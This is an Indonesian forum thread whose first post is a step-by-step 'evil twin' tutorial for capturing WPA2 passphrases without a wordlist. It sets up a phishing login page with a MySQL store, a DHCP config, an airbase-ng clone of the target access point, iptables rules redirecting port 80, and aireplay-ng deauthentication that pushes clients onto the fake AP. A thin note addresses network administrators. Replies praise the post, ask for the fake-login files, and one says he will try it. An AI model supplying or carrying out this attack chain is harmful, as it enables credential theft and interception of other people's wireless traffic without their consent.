[Share] wpa/wpa2 hacking tanpa wordlist/bruteforce
#1
Kembali lagi bersama dengan ane , zee eichel kali ini saya akan mencoba membahas tentang metode serangan pada wpa2 tanpa menggunakan wordlist atau metode bruteforcing dengan aircrack-ng, sering menjadi keluhan dari teman-teman karena sulitnya menembus wpa2 tanpa menggunakan tehnik standart. Metode kali ini disebut eviltwin sehingga dapat menjadi pengalaman serta wejangan kita sebagai administrator jaringan wireless atau wiffi agar dapat waspada dan berhati-hati terdahap kemungkinan serangan seperti ini

Modus serangan ini sebenarnya simple , baik akan saya jelaskan satu demi satu bagaimana attacker melakukan trik ini. Inti dari trik ini, adalah membuat akses point palsu yang di buat serupa mungkin dengan ap target, dengan harapan client akan salah konek atau mengkoneksikan dirinya ke akses point yang bukan sebenarnya.Masih ingat metode fakelogin ? yup attacker akan mengkombinasikan serangan ini dengan metode fakelogin yang memiliki kemampuan untuk menyimpan data. Bagaimana attacker melakukannya ? baik kita mulai

[hide]

1. Mempersiapkan fakelogin AP (fakelogin template)

A. Membuat database

Seperti yang saya jelaskan sebelumnya , ada baiknya kita membuat sebuah database pada localhost kita karena tujuan dari serangan ini adalah membawa client dari AP target mengakses sebuah fakelogin pada localhost kita sehingga client tersebut tertipu dan melakukan authentifikasi di fakelogin tersebut. Database yang saya setting pada fakelogin palsu adalah bernama wpa2 karena itu kita buat database wpa2 dan buat table content Lebih jelasnya lihat ss di bawah ini.Ok jalankan service daemon mysql terlebih dahulu ,

Code:
/etc/init.d/mysql start

Spoiler! :
[Image: hacking_wpa_without_passlst.png]
[Image: hacking_wpa_without_passlst_3.png]


B. FakeLogin

Buatlah fakelogin pada localhost kita , unzip file yang telah kita download dari ftp IBTeam tadi kemudian usahakan taruh pada direktori pada service apache, kalau di backtrack atau ubuntu bisa ditempatkan di direktori /var/www

Code:
[email protected]:/var/www# ls -al
total 84
drwxrwxrwx 6 531 527 4096 2012-03-17 17:21 .
drwxr-xr-x 15 root root 4096 2011-05-10 22:56 ..
-rw-r--r-- 1 root root 1035 2011-12-27 19:16 error.html
-rw-r--r-- 1 root root 1455 2011-12-27 16:23 gradientstrip.gif
-rw-r--r-- 1 root root 1149 2012-01-04 23:06 index.html
-rwxrwxrwx 1 531 527 13 2011-03-30 04:45 .lastlogin
-rw-r--r-- 1 root root 716 2012-03-17 16:51 savekey.php
-rw-r--r-- 1 root root 892 2012-03-17 16:47 update.html
-rw-r--r-- 1 root root 651 2011-12-27 17:58 verizon.css
-rw-r--r-- 1 root root 3195 2011-12-27 16:24 vlogo_blk.gif

Jika sudah jalankan service apache kita /etc/init.d/apache2 start kemudian buka localhost atau dengan ip local kita pada browser.

Spoiler! :
[Image: hacking_wpa_without_passlst_1.png]

Okey semua yang kita butuhkan sudah siap , kemudian seperti yang sudah saya singgung di atas, attacker akan membuat sebuah AP palsu yang hampir sama dengan AP Target.

2. FakeAP

A. Information Gathering

Metode ini di mulai dari tahap information gathering terhadap AP Target. dimana kita mengambil semua informasi kemudian membuat AP yang sama persis dengan AP target. Ok kita mulai

Spoiler! :
[Image: hacking_wpa_without_passlst_2.png]

Percobaan ini saya lakukan pada IBTeam Lab di jakarta, sehingga saya memakai IBTeam AP sebagai target. Gunakan airodump-ng [interface-monitor] untuk mengambil informasi AP Target.

B. Dhclient Server

Untuk keperluan membuat fakeAP dengan kemampuan dhcp kita harus menginstall dhclient server di localhost kita, pengguna backtrack dan debian lainnya dapat menginstall service ini dengan apt-get

Spoiler! :
[Image: hacking_wpa_without_passlst_4.png]

Uppz ada keterangan fail disitu .. itu dikarenakan setingan file konfigurasi pada dhcp3-server belum di konfigurasi dengan benar. Baik sebelumnya kita backup terlebih dahulu file konfigurasi default sebelum membuat file konfigurasi yang kita inginkan.
Code:
[email protected]:/var/www# mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

Jika sudah kita buat file konfigurasi dengan setingan yang kita kehendaki dengan menggunakan editor kesayangan anda,
Code:
[email protected]:/var/www# kwrite /etc/dhcp3/dhcpd.conf

Kemudian isikan seperti contoh di bawah ini, anda dapat menggantinya sesuai kebutuhan konfigurasi IP, DNS, gateway , dll.

Code:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;

Konfigurasi di atas sebenarnya merupakan konfigurasi IP yang nantinya akan di pakai pada AP palsu kita nantinya. Dan adanya support DHCP agar client bisa mendapatkan ip secara otomatis.

C. Airbase-ng


Ok tahap selanjutnya kita akan membuat FakeAP dengan konfigurasi IP yang sama dengan konfigurasi pada dhcp server yang telah kita buat pada tahap sebelumnya. Namun informasi AP haruslah sama dengan hasil tahap information gathering terhadap AP target. kita matikan terlebih dahulu beberapa proses monitor pertama

Code:
[email protected]:~# airmon-ng stop mon0
Interface Chipset Driver
mon0 Ralink RT2870/3070 rt2800usb - [phy0] (removed)
wlan1 Ralink 2573 USB rt73usb - [phy2]
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
[email protected]:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan1 Ralink 2573 USB rt73usb - [phy2]
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode disabled)

Jika sudah sesuai dengan channel AP target (dalam kasus ini 11 lihat pada tahap information gathering) , kita memulai airmon-ng pada channel 11.

Setelah itu kita jalankan airbase-ng untuk memulai FakeAP. ssid dan channel disikan persis sama dengan hasil information gathering dengan airodump untuk mengecoh client.

syntaxnya :
Code:
airbase-ng -e [ssid] -c [channel] -a [bssid] [interface]

Spoiler! :
[Image: hacking_wpa_without_passlst_5.png]

Kemudian perhatikan output pada perintah airbase-ng yang telah kita jalankan barusan, nah airbase-ng akan menciptakan sebuah interface baru yaitu dimana nantinya interface at0 tersebut yang akan menjadi patokan konfigurasi IP pada fakeap yang sendang kita buat. Karena itu konfigurasikan IP pada at0 sesuai dengan konfigurasi routing pada DNS, netmask, gw ( gateway ) pada file /etc/dhcp3/dhcpd.conf. Kemudian jalankan service <em>dhcp3-server.

Spoiler! :
[Image: hacking_wpa_without_passlst_6.png]

3. IPtables

Setelah semuanya berhasil dengan baik, harapan attacker adalah client terkecoh ketika mengakses fakeAP yang telah di buat sebelumnya, maka attacker berharap agar client mengira bahwa authentifikasi pada wpa2 yang diaksesnya berubah menjadi authentifikasi pada browser. yaitu pada index fakelogin yang telah kita siapkan pada server apache/httpd pada localhost kita. Permasalahannya adalah bagaimana client dapat mengakses AP tidak menjadi masalah lagi, tapi bagaimana agar client mengakses localhost kita yang menjadi masalah. Baik kita gunakan iptables untuk meredirect setiap url yang dimasukan client pada browser ( port 80 ) menuju kepada localhost kita. Misalnya client mengakses google.com maka browser akan mengarahkannya terlebih dahulu ke file pada localhost apache kita.

A. Menghapus semua setingan IPtables.

Pertama-tama kita hapus semua setingan iptables pada NAT, chain ,dll

Code:
[email protected]:~# iptables --flush
[email protected]:~# iptables --table nat --flush
[email protected]:~# iptables --delete-chain
[email protected]:~# iptables --table nat --delete-chain

B.Lakukan routing untuk membuat interface at0 dapat diselaraskan dengan interface inti ( eth0 )

Code:
[email protected]:~# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
[email protected]:~# iptables --append FORWARD --in-interface at0 -j ACCEPT

Kemudian lanjutkan dengan mengaktifkan ip_forward

Code:
[email protected]:~# echo 1 /proc/sys/net/ipv4/ip_forward

C. Redirect semua permintaan pada port 80

Buatlah sebuah rulles pada iptables agar client akan teredirect pada saat mengakses port 80. Alamat yang digunakan sebagai destination ( tujuan ) tentu saja adalah alamat pada interface kita yang terkoneksi dengan internet.

Code:
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
inet addr:192.168.1.13 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:99424 errors:0 dropped:0 overruns:0 frame:0
TX packets:92864 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:94380248 (94.3 MB) TX bytes:16195158 (16.1 MB)
Interrupt:43

Okey seperti ouput di atas agaknya saya menggunakan ip address 192.168.1.13 yang terkonek dengan gateway berbeda dengan akses point target. Hmm jgn bingung dengan hal ini karena ada kemungkinan pada administrasi jaringan sysadmin memakai beragam subnet ip pada tiap2 AP yang terdapat dalam satu jaringan.

Code:
[email protected]:~#iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.13:80
[email protected]:~# iptables -t nat -A POSTROUTING -j MASQUERADE

4. Deauthentifikasi


Agar client terkecoh sesuai dengan tujuan kita , tentunya kita harus mematikan terlebih dahulu akses point dan client yang terkonek didalamnya agar client nantinya malah login ke fakeAP. Kita gunakan aireplay-ng , ane rasa masih pada ingat perintah-perintah dasarnya

Spoiler! :
[Image: hacking_wpa_without_passlst_7.png]

Perhatikan pada tab terminal airbase-ng, okey ternyata korban memakan pancingan setelah terdeauthentifikasi dari APTarget dan melakukan authentifikasi ke FakeAP

Spoiler! :
[Image: hacking_wpa_without_passlst_8.png]

Client Target side

Mari kita mengintip sebentar proses pada client, Client pada percobaan kali ini memakai sistem operasi windows 7 , anggap saja client masih terkonek dengan AP asli , lihat pada gambar di bawah ada 2 AP yang telah terbentuk

Spoiler! :
[Image: terkonekdenganapasli.jpg]

Dan client pada saat client terkoneksi dengan FakeAP maka routing Iptables ternyata berhasil dengan baik

Spoiler! :
[Image: iptablesberhasil.jpg]

Anggap client terpancing untuk mengisi password wpa

Spoiler! :
[Image: iptablesberhasil_1.jpg]

Spoiler! :
[Image: iptablesberhasil_2.jpg]

5. Melihat hasil


Kita tinggal melihat pada database yang telah kita buat tadi , kalau client terkecoh kemudian mengisi password maka password akan terecord pada database

Spoiler! :
[Image: hacking_wpa_without_passlst_9.png]

Oke sampai disini dulu ya.. semoga nantinya ada tehnik-tehnik lainnya yang bisa saya jabarkan untuk teman-teman ..

sumber : http://technicdynamic.com/2011/12/hackin...ruteforce/

[/hide]

download attachment : http://zico-ekel.com/wpawpa2-hacking-tan...ruteforce/
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
mantap om zee,,oh ya itu ada ebebrapa gambar yang gak keluar Smile

#3
sudah di benerin om heheheh
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#4
siip Smile

#5
Mantap om zee eichel Smile tambah ilmu baru ni
Fake login nya nga bisa Download om Sad

#6
mantap boleh dicoba dah wkwkwk Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#7
Thumbs Up 
ne download fake AP nya ga ad ya...
(03-19-2012, 08:13 PM)djetrack Wrote: ne download fakelogin AP nya ga ad ya...di kasi yg direct linknya aja bro


#8
wah mantap nih Om zee,,izin coba ahh...

#9
panjang amir om. :!
[Image: 33529117274.jpg]

#10
(03-19-2012, 11:11 PM)nesta Wrote: panjang amir om. :!

wkwkw sabirr om Smile orang sabir disayang loh Big Grin






Users browsing this thread: 2 Guest(s)